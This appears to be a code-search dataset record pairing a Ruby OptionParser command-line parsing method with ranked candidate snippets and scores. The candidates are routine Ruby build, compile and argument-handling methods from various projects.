"def generate_compilation\n puts \"Generating compilation\"\n get_selected_vines\n pathArray = [];\n @selected_vines.each do |vid|\n vine = Vine.find(vid)\n pathArray.push vine.path\n end\n if pathArray.count > 0\n return outputFile = execute_ffmpeg(pathArray)\n end\n end",
"def create\n\n # Let's get a few things straight\n @work_dir = \"#{@resource[:cache_dir]}/#{@resource[:extension]}\"\n @php_version_prefix = \"#{@resource[:phpenv_root]}/versions/#{@resource[:php_version]}\"\n @resource[:compiled_name] ||= \"#{@resource[:extension]}.so\"\n\n # Update the repository\n fetch @resource[:version], @resource[:extension]\n\n # Prepare for building\n prep_build @resource[:version]\n\n # PHPize, build & install\n phpize\n configure\n make\n install\n end",
"def compile()\n begin\n\n @config = FILE_IMPORTER.load(@config, true)\n\n Wavy::Parsers::Import.load(@config, @config_root)\n Wavy::Parsers::Import.extract\n\n if @view == false\n exports = Wavy::Models::Exports.get\n exports.each do |key, export|\n rendered = self.class.render(export.path)\n output(rendered['template'], rendered['full_path'], rendered['file_path'])\n end\n else\n rendered = self.class.render(@view)\n output(rendered['template'], rendered['full_path'], rendered['file_path'])\n end\n\n rescue Exception => e\n puts e.message\n end\n end",
"def compile(mod, grammar_or_parser, opts={})\r\n model = parser_model(grammar_or_parser)\r\n mod.module_eval ParserGenerator.code_for(model, opts)\r\n mod\r\n end",
"def compile\n # setup configurations\n configurations\n\n # Download and untar apache2\n apache2 = download_untar @configuration[\"download_url\"]\n\n # download and untar zlib\n zlib = download_untar @configuration[\"zlib_download_url\"]\n\n @logger.debug\"ZlIB Dir Content: #{Dir[File.join(zlib,\"*\")]}\"\n # configure and compile zlib\n zlib_configure_file = File.join(zlib,\"configure\")\n zlib_install_dir = File.join(@application.cache_dir,\"zlib\")\n\n shell_script = File.join(@application.buildpack_dir,\"resources/shell/compile_zlib.sh\");\n fail \"Shell Script failed\" unless 0 == system(\"./#{shell_script}\")\n # @logger.debug(\"#{zlib_configure_file} --prefix=#{zlib_install_dir}\")\n # result = system(\"#{zlib_configure_file} --prefix=#{zlib_install_dir}\")\n #\n # puts result\n # @logger.debug(\"Configure ZLIB result: #{result[0..-100]}\")\n #\n # # Make zlib\n # @logger.debug(\"make -C #{zlib}\")\n # result = `make -C #{zlib}`\n # puts result\n # @logger.debug(\"Make ZLIB result: #{result[0..-100]}\")\n # @logger.debug(\"make install -C #{zlib}\")\n # result = `make install -C #{zlib}`\n # @logger.debug(\"Make Install Result: #{result[0..-100]}\")\n\n @logger.debug \"Zlib Install Location: #{Dir[File.join(zlib_install_dir,'*')]}\"\n\n end",
"def build!\n test_git!\n\n file_list = Dir.glob(\"#{@source}*\").sort # Pull the file list before creating the target directory\n\n setup_target\n\n add_runner\n\n file_list.each do |infile_name|\n rewrite_animation_frame infile_name\n create_commit infile_name\n end\n end",
"def compile\n prep\n client.setup_run_context\n end",
"def compile\n system \"rm -rf #{new_relic_home}\"\n system \"mkdir -p #{new_relic_home}\"\n system \"mkdir -p #{File.join new_relic_home, 'logs'}\"\n\n JavaBuildpack::Util.download(@version, @uri, 'New Relic Agent', jar_name(@version), new_relic_home)\n copy_resources new_relic_home\n end",
"def test_compile(code, stage = :compile)\n log.debug \"Testing compilation of:\\n\" + code\n\n # Write the code to a temporary source file\n f = Tempfile.new(['test_compile', @extension]);\n f.print code\n f.flush\n\n # Run the compiler\n cc = self # KLUDGE, testing\n cc.sources = f.path\n cc.output = f.path.sub(/\\.c$/, Platform.object_extension)\n cc.quiet = ENV['MAKECONF_DEBUG'].nil?\n rc = cc.compile\n\n # (Optional) Run the linker\n if (rc == true and stage == :combined)\n cc.ld.quiet = true\n rc = cc.link\n File.unlink(cc.ld.output) if File.exist? cc.ld.output\n end\n\n # Delete the output file(s)\n File.unlink(cc.output) if File.exist? cc.output\n\n return rc\n end",
"def compile_from_command_line(args)\n compress = false\n if args.index(\"-c\") != nil or args.index(\"--compress\") != nil\n compress = true\n args = args.keep_if { |arg| [\"-c\", \"--compress\"].index(arg) == nil }\n end\n \n if args.index(\"-d\") != nil\n d_index = args.index(\"-d\")\n if args.length < d_index + 1\n raise Exception, \"The -d argument must be followed immediately by a directory path in which to compiler .wml files.\"\n end\n \n dir_path = args[d_index + 1]\n \n if !File.directory? dir_path\n raise Exception, \"Invalid directory path following -d argument.\"\n end\n \n Dir.chdir dir_path\n if args[\"-r\"] != nil\n Dir['**/*'].each { |f|\n if File.directory? f and ['.', '..'][f] == nil\n puts f\n compile_file_from_path(f, :strict => false, :compress => compress)\n end\n }\n else\n Dir['*'].each { |f|\n if File.directory? f and ['.', '..'][f] == nil\n puts f\n compile_file_from_path(f, :strict => false, :compress => compress)\n end\n }\n end\n \n else\n strict = true\n if args.index(\"-f\") != nil or args.index(\"--force\") != nil\n strict = false\n args = args.keep_if { |arg| [\"-f\", \"--force\"].index(arg) == nil }\n end\n \n args.each { |filepath|\n compile_file_from_path(filepath, :strict => strict, :compress => compress)\n }\n \n end\nend",
"def compile_main(exp)\n @e.main do\n # We should allow arguments to main\n # so argc and argv get defined, but\n # that is for later.\n @main = Function.new([],[])\n @global_scope = GlobalScope.new\n compile_eval_arg(FuncScope.new(@main, @global_scope), exp)\n end\n\n # after the main function, we ouput all functions and constants\n # used and defined so far.\n output_functions\n output_constants\n end",
"def create_compile_ext_tasks(source_root, dest_root, invoking_task)\n compiled_ext = \"#{source_root}/#{SPECIAL_BUNDLE_NAMES[File.basename(source_root)] || File.basename(source_root)}.bundle\"\n create_copy_file_tasks(FileList[compiled_ext], source_root, dest_root, invoking_task)\n file compiled_ext => FileList[\"#{source_root}/*.c\"] do\n cd source_root do\n `ruby extconf.rb; make >/dev/null 2>&1`\n end\n end\nend",
"def recompile\n @compiled = nil\n compile\n end",
"def compile\n Liberty.validate(@app_dir)\n @liberty_components_and_uris, @liberty_license = Liberty.find_liberty_files(@app_dir, @configuration)\n unless LibertyBuildpack::Util.check_license(@liberty_license, @license_id)\n print \"\\nYou have not accepted the IBM Liberty License.\\n\\nVisit the following uri:\\n#{@liberty_license}\\n\\nExtract the license number (D/N:) and place it inside your manifest file as a ENV property e.g. \\nENV: \\n IBM_LIBERTY_LICENSE: {License Number}.\\n\"\n raise\n end\n download_and_install_liberty\n link_application\n update_server_xml\n make_server_script_runnable\n download_and_install_features\n # Need to do minify here to have server_xml updated and applications and libs linked.\n minify_liberty if minify?\n overlay_java\n set_liberty_system_properties\n set_jdk_memory_configuration\n populate_class_cache if populate_class_cache_staging?\n end",
"def compile\r\n case language\r\n when :boolexp\r\n true\r\n when :fart\r\n @prog = Farts::Parser.new.parse(src)\r\n log.info \"Compile of FART program - #{name}\"\r\n true\r\n else\r\n false\r\n end\r\n rescue Exception\r\n log.error $!\r\n @prog = nil\r\n false\r\n end",
"def compile(script, filename=nil, linenum=nil)\n filename ||= 'none'\n linenum ||= 1\n native_compile(script, filename, linenum)\n end",
"def process(spec, argv)\n compile(spec)\n interpret(argv)\n self\n end",
"def compile_file(ctx, source)\n compile_string(ctx, File.read(source))\n rescue StandardError => e\n puts \"Error compiling file: #{source}\"\n raise e\n end",
"def compile(infile, outfile, asm)\n\n File.open(infile, 'r') do |input|\n File.open(outfile, 'wb') do |out|\n compiler = Compiler.new(input, asm)\n out.print(compiler.compile)\n end\n end\n\nrescue ParseError => e\n error(\"[error] #{e.message}\")\n error(\"[context] #{e.context}\")\n # error(\"Aborting!\")\n error(e.caller)\n exit(1)\nend"
] |
[
"0.6823948",
"0.6362989",
"0.63502246",
"0.61257815",
"0.60613436",
"0.60349697",
"0.60108215",
"0.6002097",
"0.59822905",
"0.5947855",
"0.5895054",
"0.5806892",
"0.57201964",
"0.57150155",
"0.57021344",
"0.56926584",
"0.56812584",
"0.5639252",
"0.56190336",
"0.5608342",
"0.55780905",
"0.55516464",
"0.55414695",
"0.55161566",
"0.5513474",
"0.54941696",
"0.54925865",
"0.5482381",
"0.5471589",
"0.5460296",
"0.5447598",
"0.5437917",
"0.5433732",
"0.54297906",
"0.54162353",
"0.5415956",
"0.5409241",
"0.53996015",
"0.5387614",
"0.5383013",
"0.5378252",
"0.53754526",
"0.5365138",
"0.5355655",
"0.53539217",
"0.53278196",
"0.5322133",
"0.53200763",
"0.53160346",
"0.53113437",
"0.53071964",
"0.5304031",
"0.5297035",
"0.5271057",
"0.5270507",
"0.5263752",
"0.52613395",
"0.5259612",
"0.5247219",
"0.52433777",
"0.524288",
"0.524288",
"0.5238153",
"0.5238153",
"0.5238153",
"0.5229328",
"0.52246994",
"0.52004683",
"0.5197226",
"0.5195545",
"0.5179402",
"0.5177416",
"0.5169128",
"0.51687986",
"0.5165627",
"0.51625586",
"0.5158402",
"0.5151984",
"0.5149459",
"0.5144559",
"0.5140605",
"0.5137559",
"0.5137371",
"0.5128883",
"0.5116478",
"0.5108768",
"0.51005536",
"0.5090945",
"0.5082664",
"0.50820166",
"0.5066214",
"0.50623226",
"0.5059677",
"0.50574976",
"0.5050094",
"0.5048028",
"0.50342774",
"0.50288546",
"0.50219786",
"0.5010694"
] |
0.78810585
|
0
|
Read any command line arguments and process them
|
def parse_command_line
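  # OptionParser#parse! consumes recognized switches from ARGV in place,
  # leaving any remaining positional arguments behind for later processing.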
OptionParser.new do |opts|
opts.banner = "Usage: ruby #{$0} [options]"
opts.on_head("-h", "--help", "Show this help message") do
puts opts
exit
end
opts.on("-v", "--verbose", "Show all progress messages (INFO, DEBUG, WARNING, ERROR)") do
Logger.verbose = true
end
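      # Logger here is assumed to be a project-specific logger class exposing
      # verbose=/quiet= class flags; Ruby's stdlib Logger has no such attributes.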
opts.on("-q", "--quiet", "Only show WARNING and ERROR messages") do
Logger.quiet = true
end
opts.on("--console", "Open up a console to query the source via rbgccxml") do
@requesting_console = true
end
opts.on("--clean", "Force a complete clean and rebuild of this extension") do
@force_rebuild = true
end
end.parse!
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def process_arguments\n @args << \"-h\" if(@args.length < 1)\n \n opts_parse = OptionParser.new do |opts|\n opts.on('-f','--file FILE','use the following local file') {|file| @options.file = File.expand_path(file)}\n opts.on('-p','--parse PARSE',\"sets which set of sider files to download #{@@sections.join(\"|\")}\") {|parse| @options.parse = parse}\n opts.on('-d','--download','download the file to be parsed') {@options.download = true}\n opts.on('-o','--output DIR','set the output directory') {|directory| @options.output = File.expand_path(directory)}\n opts.on('-h','--help',\"prints the help\"){puts opts; exit!}\n end\n \n opts_parse.parse!(@args) rescue raise \"There was an error processing command line arguments use -h to see help\"\n end",
"def process_args\n args = @args.dup\n @options[:operands] = nil\n unless args.length >= 2\n puts @opts\n exit 1\n end\n @options[:operands] = args.shift(2)\n @options[:output_filename] = args.shift unless args.empty?\n @options[:output] ||= @options[:output_filename] || $stdout\n\n run\n end",
"def process_args\n if has_directory?\n @directory_to_parse = @args[0]\n else\n @files = @args[0...@args.count-3]\n @owner = @args[@args.count-3]\n @repo = @args[@args.count-2]\n @token = @args[@args.count-1]\n end\n end",
"def process(args)\n args\n end",
"def parse_arguments\n @arguments = ARGV.collect { |arg| arg.strip }\n @filename = Pathname.new(@arguments.first)\n end",
"def processCommandLineOptions\n if ARGV\n ARGV.each do |arg|\n if arg.index('=')\n setting, value = arg.split('=')\n setting = setting.chomp\n value = value.chomp.strip\n if setting == 'logLevel'\n value = value.upcase.gsub(/\\'/,'')\n level = LEVELS_TEXT.index(value.upcase)\n @currentLogLevel = level if level\n elsif setting == 'consoleLogging'\n @consoleLogging = value.downcase == 'true'\n elsif setting == 'logfile'\n @currentFileName = File.expand_path(value)\n end\n end\n end\n end\n end",
"def handle_arguments(args)\n if input_file.nil?\n print_usage\n true\n else\n args.help || args.version\n end\n end",
"def setup\n begin\n @options = OptParser.parse(ARGV)\n rescue ParserExceptions::MissingArgument\n exit(1)\n end\n\n end",
"def parse argv\n parse_args argv do |argv, remaining_args, arg|\n remaining_args << arg\n end\n end",
"def parse_arguments(args)\n Trollop::with_standard_exception_handling argument_parser do\n if args.empty? || args.include?('-h') || args.include?('--help')\n raise Trollop::HelpNeeded\n elsif args.include?('--examples')\n print_examples\n end\n argument_parser.parse args\n end\n end",
"def process_args\n @options = { sequence_num: nil, directory: nil, verbose: false }\n\n @optparse = OptionParser.new do |opts|\n opts.banner = 'Usage: Upload directory to MOA repository'\n\n @options[:sequence_num] = nil\n opts.on( '-s', '--seq SEQ', Integer, 'disk upload sequence number' ) do |seq|\n @options[:sequence_num] = seq\n end\n\n @options[:batch] = 1\n opts.on( '-b', '--batch BATCH', Integer, 'Start from batch number' ) do |batch|\n @options[:batch] = batch\n end\n\n @options[:batchsize] = BATCH_SIZE\n opts.on( '-n', '--batchsize BATCHSIZE', Integer, 'Set Batch Size (Default 5000 files)' ) do |batchsize|\n @options[:batchsize] = batchsize\n end\n\n @options[:directory] = nil\n opts.on( '-d', '--dir DIR', String, 'directory to upload' ) do |dir|\n @options[:directory] = dir\n end\n\n @options[:verbose] = false\n opts.on( '-v', '--verbose', 'Output more information' ) do\n @options[:verbose] = true\n end\n\n opts.on( '-?', '--help', 'Display this screen' ) do\n puts opts\n exit\n end\n end\n\n @optparse.parse!\n\n if @options[:directory].nil? || @options[:sequence_num].nil?\n puts @optparse\n exit(-1)\n end\nend",
"def parse_args\n case ARGV[0]\n when '-a'\n # check that no arg was passed with the -a flag.\n if ARGV[1]\n puts \"Error, '-a' flag cannot accept additional arguments.\"\n puts \"Run `validate-pp -h` for more info.\"\n exit!\n end\n parse_directory(File.expand_path(Dir.pwd))\n when '-d'\n ARGV.shift\n ARGV.each do |d|\n unless File.directory?(d)\n puts \"Error, #{d} is not a directory.\"\n puts \"Run `validate-pp -h` for more info.\"\n exit!\n end\n end\n dirs = ARGV.map { |d| File.expand_path(d) }\n dirs.each { |d| parse_directory(d) }\n when \"-f\"\n ARGV.shift\n ARGV.each do |f|\n unless File.extname(f) == '.pp'\n puts \"Error, #{f} is not a '.pp' file\"\n puts \"Run `validate-pp -h` for more info.\"\n exit!\n end \n end\n ARGV.each { |f| PuppetFile.new(File.expand_path(f)) }\n when '-g'\n if ARGV[1]\n puts \"Error, '-g' flag cannot accept additional arguments.\"\n puts \"Run `validate-pp -h` for more info.\"\n exit!\n end\n parse_git_repo\n end\nend",
"def argv; argline.split(/ +/) unless argline.nil?; end",
"def parse_args\n parser = Trollop::Parser.new do\n opt :resume\n opt :verbose\n version \"\"\n end\n\n parse do\n parser.parse\n end\n end",
"def command_line\r\n ARGV.each do |arg|\r\n if arg == \"instructions\"\r\n instructions\r\n elsif arg == \"calculator\"\r\n ask_for_digits\r\n else\r\n \r\n end\r\n end\r\n \r\n end",
"def parse\n @opts = OptionParser.new { |opts| process_opts(opts) }\n @opts.parse!(@args)\n\n process_args\n\n @options\n end",
"def parsed_args\n args = Options.new('binnacle - Simple Test and Infra automation Framework')\n args.verbose = 0\n args.runner = false\n args.result_json = ''\n\n opt_parser = OptionParser.new do |opts|\n opts.banner = 'Usage: binnacle [options] <testfile>'\n\n opts.on('-w', '--wide', 'Do not crop the task line') { args.wide = true }\n opts.on('-v', '--verbose', 'Verbose output') { args.verbose += 1 }\n opts.on('-r', '--runner', 'Run the tasks from a file (Internal use only)') { args.runner = true }\n opts.on('--results-json=FILE', 'Results JSON file') do |json_file|\n args.result_json = json_file\n end\n\n opts.on('-h', '--help', 'Prints this help') do\n puts opts\n exit\n end\n\n opts.on('--version', 'Show Version information') do\n puts \"Binnacle #{Binnacle::VERSION}\"\n exit\n end\n end\n\n opt_parser.parse!(ARGV)\n\n if ARGV.empty?\n warn 'Task file is not specified'\n exit EXIT_INVALID_ARGS\n end\n\n args.task_files = ARGV\n args\nend",
"def read_arguments\n\tif (ARGV.length() < 2)\n\t\traise ArgumentError, \"Invalid number of arguments, \\n correct usage 'ruby ./661561-project-one.rb <input_file> <regression_type>'\"\n\tend\n\t\n\tfilename = ARGV[0]\n\tregression_type = ARGV[1]\n\n\tif !(VALID_REGRESSIONS.include? regression_type)\n\t\traise ArgumentError, 'Regression type is not valid.'\t\n\tend\n\n\treturn filename, regression_type\n\nend",
"def run\n begin\n process_arguments\n rescue ArgumentError\n output_usage\n end\n end",
"def parse_command_line args\n args.options do |opt|\n opt.on(\"rutema v#{Version::STRING}\")\n opt.on(\"Options:\")\n opt.on(\"--config FILE\", \"-c FILE\",String,\"Loads the configuration from FILE\") { |config_file| @config_file=config_file}\n opt.on(\"--check\",\"Runs just the suite setup test\"){@check=true}\n #opt.on(\"--step\",\"Runs test cases step by step\"){@step=true}\n opt.on(\"--silent\",\"Suppresses console output (only for the default reporters)\") { @silent=true}\n opt.on(\"--bare\",\"No default reporters whatsoever\") { @bare=true}\n #opt.on(\"--color\",\"Adds color to the Console reporter\") { @color=true}\n opt.on(\"-v\", \"--version\",\"Displays the version\") { $stdout.puts(\"rutema v#{Version::STRING}\");exit 0 }\n opt.on(\"--help\", \"-h\", \"-?\", \"This text\") { $stdout.puts opt; exit 0 }\n opt.on(\"--debug\", \"-d\", \"Turn on debug messages\") { $DEBUG=true }\n opt.on(\"You can provide a specification filename in order to run a single test\")\n opt.parse!\n #and now the rest\n unless @config_file\n puts \"No configuration file defined!\\n\"\n $stdout.puts opt \n exit 1\n end\n if !args.empty?\n @test_identifier=args.shift\n end\n end\n end",
"def run\n @arguments = ArgumentParser.get_arguments VALID_ARGUMENTS\n print_help if (@arguments[:options][:help])\n print_version if (@arguments[:options][:version])\n if (@arguments[:keywords][:export])\n handle_export\n elsif (@arguments[:keywords][:import])\n handle_import\n else\n print_help\n end\n end",
"def parse_arguments\n\toptions = {}\n\t\n\toptparse = OptionParser.new do|opts| \n\t\t# Set a banner, displayed at the top \n\t\t# of the help screen. \n\t\topts.banner = \"Usage: ruby #{$0} [options] file1 file2...\"\n\n\t\t#Figure out the framerate\n\t\toptions[:framerate] = DEFAULT_FRAMERATE\n\t\trates = [23.976, 23.98, 24, 25, 29.97, 30, 50, 59.94, 60]\n\t\topts.on('-f', '--framerate RATE', Float, \"The framerate of your sequence. Defaults to #{DEFAULT_FRAMERATE}. Acceptable rates: #{rates}\") do |fr|\n\t\t\tif !rates.include?(fr)\n\t\t\t\tputs \"Invalid framerate. Must be one of: #{rates}.\".red\n\t\t\t\texit\n\t\t\tend\n\t\t\toptions[:framerate] = fr\n\t\tend\n\n\t\t# This displays the help screen, all programs are\n\t\t# assumed to have this option. \n\t\topts.on( '-h', '--help', 'Display this screen' ) do\n\t\t\tputs opts\n\t\t\texit\n\t\tend\n\n\tend\n\n\t#Parse the options we've set above.\n\t#Whatever is left goes into ARGV\n\toptparse.parse!\n\n\t#XML requirements. Timebase is the round number closest to the framerate\n\ttimebase = options[:framerate].round\n\tntsc = \"FALSE\"\n\n\t#NTSC is true if the true framerate is not a round number\n\t#NTSC should be true if the framerate does not match the timebase\n\tif timebase != options[:framerate]\n\t\tntsc = \"TRUE\"\n\tend\n\n\toptions[:timebase] = timebase\n\toptions[:ntsc] = ntsc\n\n\tif ARGV.length == 0\n\t\tputs \"No files listed.\".red\n\t\texit\n\tend\n\n\t#Parse out the remaining files\n\toptions[:files] = Array.new(ARGV)\n\t \n\treturn options\nend",
"def process_argv!\n args = ARGV.dup\n self.rest = []\n until args.empty? do\n arg = args.shift\n case\n when arg == '--'\n self.rest += args\n break\n when arg =~ /\\A--([\\w\\-\\.]+)(?:=(.*))?\\z/\n param, val = [$1, $2]\n param.gsub!(/\\-/, '.') # translate --scoped-flag to --scoped.flag\n param = param.to_sym unless (param =~ /\\./) # symbolize non-scoped keys\n if val == nil then val = true # --flag option on its own means 'set that option'\n elsif val == '' then val = nil end # --flag='' the explicit empty string means nil\n self[param] = val\n when arg =~ /\\A-(\\w+)\\z/\n $1.each_char do |flag|\n param = param_with_flag(flag)\n self[param] = true if param\n end\n else\n self.rest << arg\n end\n end\n end",
"def read_input_params options_cli={}\n #utility sub\n def find_first_yaml_file(dir_to_process)\n Dir.chdir(dir_to_process)\n yaml_file = nil\n Dir.glob(\"*.{yaml,yml}\") do |file|\n yaml_file = file\n break\n end \n return yaml_file\n end\n\n # read input args\n dir_to_process = Dir.pwd\n fail(\"#{dir_to_process} does not exist\") unless File.exist?(dir_to_process) \n fail(\"#{dir_to_process} is not a Directory\") unless File.directory?(dir_to_process)\n $log.info \"Dir to be processed: #{dir_to_process}\"\n \n yaml_name = options_cli['--event']||find_first_yaml_file(dir_to_process)\n fail(\"- no YAML File found;\") if yaml_name.nil? \n fail(\"- no YAML File found;\") unless File.file?(yaml_name)\n $log.info \"YAML Profile to be processed: #{yaml_name}\"\n return [dir_to_process, yaml_name]\nend",
"def parse_args()\r\n\t\tfor arg in ARGV\r\n\t\t\tif arg == \"-d\"\r\n\t\t\t\t@daemonize = true\r\n\t\t\telsif arg == \"development\" || arg == \"production\"\r\n\t\t\t\t@db_env = arg\r\n\t\t\tend\r\n\t\tend\r\n\t\tputs \"Using DB: #{@db_env}\"\r\n\tend",
"def parse_args(args)\n options = {\n :excount => 5,\n :testdata => nil,\n :console => false,\n :raw => false,\n :pronounciation_offset => 1,\n :definition_offset => 2,\n :url => \"m\"\n }\n\n opt_parser = OptionParser.new do |opts|\n opts.banner = \"Usage: #{$0} <input filepath> [options]\"\n\n opts.separator \"\"\n opts.separator \"Data options:\"\n opts.on(\"-p N\", Integer, \"Offset to pronunciation column, default 1\") do |n|\n options[:pronounciation_offset] = n\n end\n opts.on(\"-d N\", Integer, \"Offset to definition column, default 2\") do |n|\n options[:definition_offset] = n\n end\n opts.on(\"-n N\", Integer, \"Number of example sentences, default 5\") do |n|\n options[:excount] = n\n end\n opts.on(\"-u U\", String, \"Source url (#{WWWJDICExampleProvider::SOURCES.to_s}), default #{options[:url]}\") do |u|\n options[:url] = u\n end\n\n opts.separator \"\"\n opts.separator \"Testing:\"\n opts.on(\"-t\", \"--testdata [DATAFILE]\",\n \"Path to yaml data file of examples (useful for testing)\") do |d|\n options[:testdata] = d\n end\n\n opts.separator \"\"\n opts.separator \"Output:\"\n opts.on(\"-c\", \"--console\", \"Dump to console only\") do |c|\n options[:console] = c\n end\n opts.on(\"-r\", \"--raw\", \"Output raw data (all examples)\") do |c|\n options[:raw] = c\n end\n\n opts.separator \"\"\n opts.on_tail(\"-h\", \"--help\", \"Show this message\") do\n puts opts\n exit\n end\n end\n\n opt_parser.parse!(args)\n options\nend",
"def process_inputs(args)\n @input = ((name = args[:in_file]) && (IO.read(name, mode: \"rb\"))) ||\n args[:in_str] ||\n fail(\"An input must be specified.\")\n\n @generator = args[:generator] ||\n ((key = args[:key]) && Generator.new(key)) ||\n fail(\"A key or generator must be specified.\")\n\n @window = args[:window] || 16\n\n #The filler value is for testing purposes only. It should\n #not be specified when secure operation is desired.\n @fill_value = args[:filler]\n end",
"def parse_arguments\n @command_line_options = {}\n @config.insert 0, '<command_line>', @command_line_options\n\n @options = OptionParser.new do |opts|\n opts.on('-a', '--application STRING', 'set application name') do |application|\n @command_line_options[:application] = application\n end\n\n opts.on('-d', '--destination DIR', 'set destination directory', \"default: #{@config[:destination_directory]}\") do |directory|\n @command_line_options[:destination_directory] = directory\n end\n\n opts.on('-n', '--dryrun', 'do not switch') do\n @command_line_options[:dryrun] = true\n end\n\n opts.on('-V', '--version STRING', 'set application version to deploy') do |version|\n @command_line_options[:version] = version\n end\n end\n @options.parse!\n end",
"def process_argv!\n args = ARGV.dup\n self.rest = []\n @unknown_argvs = []\n until args.empty? do\n arg = args.shift\n case\n # end of options parsing\n when arg == '--'\n self.rest += args\n break\n # --param=val or --param\n when arg =~ /\\A--([\\w\\-\\.]+)(?:=(.*))?\\z/\n param, val = [$1, $2]\n warn \"Configliere uses _underscores not dashes for params\" if param.include?('-')\n @unknown_argvs << param.to_sym if (not has_definition?(param))\n self[param] = parse_value(val)\n # -abc\n when arg =~ /\\A-(\\w\\w+)\\z/\n $1.each_char do |flag|\n param = find_param_for_flag(flag)\n unless param then @unknown_argvs << flag ; next ; end\n self[param] = true\n end\n # -a val\n when arg =~ /\\A-(\\w)\\z/\n flag = find_param_for_flag($1)\n unless flag then @unknown_argvs << flag ; next ; end\n if (not args.empty?) && (args.first !~ /\\A-/)\n val = args.shift\n else\n val = nil\n end\n self[flag] = parse_value(val)\n # -a=val\n when arg =~ /\\A-(\\w)=(.*)\\z/\n flag, val = [find_param_for_flag($1), $2]\n unless flag then @unknown_argvs << flag ; next ; end\n self[flag] = parse_value(val)\n else\n self.rest << arg\n end\n end\n @unknown_argvs.uniq!\n end",
"def process_commandline_args\n\n params = { :sidelength => 1, :mult => 10, :stroke_width => 1,\n :cols => 3, :rows => 3,\n :nested => 1, :nested_spacing => 0.2,\n :suppress_grid => false,\n :moveto_color => '#0000ff', :lineto_color => '#ff0000',\n :xshift => 0, :yshift => 0, :gcode => false, :do_tform => false\n }\n\n ARGV.each { |a|\n if v = a.match(/^--side-length=([0-9.]+)$/) then params[:sidelength] = v[1].to_f\n elsif v = a.match(/^--cols=([0-9]+)$/) then params[:cols] = v[1].to_i\n elsif v = a.match(/^--rows=([0-9]+)$/) then params[:rows] = v[1].to_i\n elsif v = a.match(/^--nested=([0-9]+)$/) then params[:nested] = v[1].to_i\n elsif v = a.match(/^--nested-spacing=(0?\\.[0-9]+)$/) then params[:nested_spacing] = v[1].to_f\n elsif v = a.match(/^--suppress-grid(=([01]))?$/) then params[:suppress_grid] = (v[1].nil? || v[2] == \"1\")\n elsif v = a.match(/^--mult=([.0-9e]+)$/) then params[:mult] = v[1].to_f\n elsif v = a.match(/^--stroke-width=([.0-9]+)$/) then params[:stroke_width] = v[1].to_f\n elsif v = a.match(/^--moveto-color=(none|#(\\h{3}|\\h{6}))$/)\n then params[:moveto_color] = v[1]\n elsif v = a.match(/^--lineto-color=(none|#(\\h{3}|\\h{6}))$/)\n then params[:lineto_color] = v[1]\n elsif v = a.match(/^--xshift=([-.0-9]+)$/) then params[:xshift] = v[1].to_f\n elsif v = a.match(/^--yshift=([-.0-9]+)$/) then params[:yshift] = v[1].to_f\n elsif v = a.match(/^--gcode$/) then params[:gcode] = true\n elsif v = a.match(/^--apply-maths$/) then params[:do_tform] = true\n else abort \"\\nArborting!!! -- Error: unknown argument #{a}\\n\\n\"\n end\n }\n\n params\nend",
"def process_arguments\n opts_parse = OptionParser.new do |opts|\n opts.on('-f','--file FILE') {|f|@options.file = File.expand_path(f)}\n opts.on('-o','--output FILE'){|f|@options.output = File.expand_path(f)}\n end\n \n opts_parse.parse!(@arguments) rescue return false\n \n return true\n end",
"def process_arguments\n opts_parse = OptionParser.new do |opts|\n opts.on('-f','--file FILE') {|f|@options.file = File.expand_path(f)}\n opts.on('-o','--output FILE'){|f|@options.output = File.expand_path(f)}\n end\n \n opts_parse.parse!(@arguments) rescue return false\n \n return true\n end",
"def process_arguments\n opts_parse = OptionParser.new do |opts|\n opts.on('-f','--file FILE') {|f|@options.file = File.expand_path(f)}\n opts.on('-o','--output FILE'){|f|@options.output = File.expand_path(f)}\n end\n \n opts_parse.parse!(@arguments) rescue return false\n \n return true\n end",
"def process_arguments\n opts_parse = OptionParser.new do |opts|\n opts.on('-f','--file FILE') {|f|@options.file = File.expand_path(f)}\n opts.on('-o','--output FILE'){|f|@options.output = File.expand_path(f)}\n end\n \n opts_parse.parse!(@arguments) rescue return false\n \n return true\n end",
"def process_arguments\n @e_addr = @options.email\n @r_name = @options.run_names\n @m_name = @options.machine_names\n @action = @options.action\n @snfs = @options.snfs\n end",
"def parse_args\n args = {\n :stack_name => nil,\n :parameters => {},\n :interactive => false,\n :region => default_region,\n :profile => nil,\n :nopretty => false,\n :s3_bucket => nil,\n }\n ARGV.slice_before(/^--/).each do |name, value|\n case name\n when '--stack-name'\n args[:stack_name] = value\n when '--parameters'\n args[:parameters] = Hash[value.split(/;/).map { |pair| parts = pair.split(/=/, 2); [ parts[0], Parameter.new(parts[1]) ] }]\n when '--interactive'\n args[:interactive] = true\n when '--region'\n args[:region] = value\n when '--profile'\n args[:profile] = value\n when '--nopretty'\n args[:nopretty] = true\n when '--s3-bucket'\n args[:s3_bucket] = value\n end\n end\n\n args\nend",
"def parse_args\n\t\t@args = @args_a.each_slice(2).to_a.inject({}) { |h, k| h[k[0]] = k[1]; h }\n\t\tkeys = @skeys + @lkeys\n\t\t@args.each do |k, v|\n\t\t\tif !keys.include?(k)\n\t\t\t\tputs \"Unknown option `#{k}'\"\n\t\t\t\texit\n\t\t\tend\n\n\t\t\tif keys.include?(v)\n\t\t\t\tputs \"Missing values for `#{k}' and `#{v}'\"\n\t\t\t\texit\n\t\t\tend\n\n\t\t\tif v != nil\n\t\t\t\tif v.start_with?('-')\n\t\t\t\t\tputs \"Warning: Value of `#{k}' appears to be a flag\"\n\t\t\t\tend\n\n\t\t\t\tif @static.has_key?(k)\n\t\t\t\t\tif !@static[k].include?(v)\n\t\t\t\t\t\tputs \"Unknown option `#{v}' for `#{k}'\"\n\t\t\t\t\t\texit\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t\n\t\tif remove_keys(@no_vals).has_blank?\n\t\t\tputs \"Missing argument(s)\"\n\t\t\texit\n\t\tend\t\t\t\n\tend",
"def parse_arguments\n OptionParser.new do |parser|\n # parser.banner = \"Usage: init.rb -c <integer>\"\n parser.on(\"-c\", \"--count COUNT\", Integer, \"Specify number of uuid's to generate\") do |c|\n @options[:count] = c\n end\n parser.on(\"-f\", \"--file FILE\", \"Specify path to save csv file example -f '/path/to/file.csv'\") do |path|\n @options[:path] = path\n end\n end.parse!\n end",
